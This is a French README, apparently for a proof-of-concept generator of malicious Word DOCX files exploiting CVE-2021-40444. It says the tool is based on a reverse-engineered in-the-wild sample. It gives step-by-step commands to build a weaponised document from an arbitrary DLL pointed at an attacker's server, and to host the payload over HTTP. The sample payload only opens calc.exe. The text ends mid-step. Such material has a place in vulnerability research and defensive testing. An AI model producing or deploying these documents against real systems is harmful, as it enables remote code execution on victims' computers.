
Génère des documents DOCX malveillants exploitant CVE-2021-40444 (Microsoft Office Word RCE) avec un serveur HTTP intégré pour la livraison de la charge utile, basé sur des échantillons réels rétro-ingéniérés.
Générateur de docx malveillant pour exploiter CVE-2021-40444 (Exécution de code à distance dans Microsoft Office Word)
La création de ce script est basée sur du reverse engineering de l'échantillon utilisé in-the-wild : 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (fichier docx)
Vous devez d'abord installer lcab (sudo apt-get install lcab)
Consultez REPRODUCE.md pour les étapes de reproduction manuelle
Si votre cab généré ne fonctionne pas, essayez de pointer l'URL d'exploit.html vers calc.cab
Générez d'abord un document docx malveillant à partir d'une DLL, vous pouvez utiliser celle située dans test/calc.dll qui lance simplement calc.exe via un appel à system()
python3 exploit.py generate test/calc.dll http://<SRV IP>

Une fois le docx malveillant généré (il se trouvera dans out/), vous pouvez configurer le serveur :
sudo python3 exploit.py host 80

Enfin, testez le docx dans une machine virtuelle Windows :
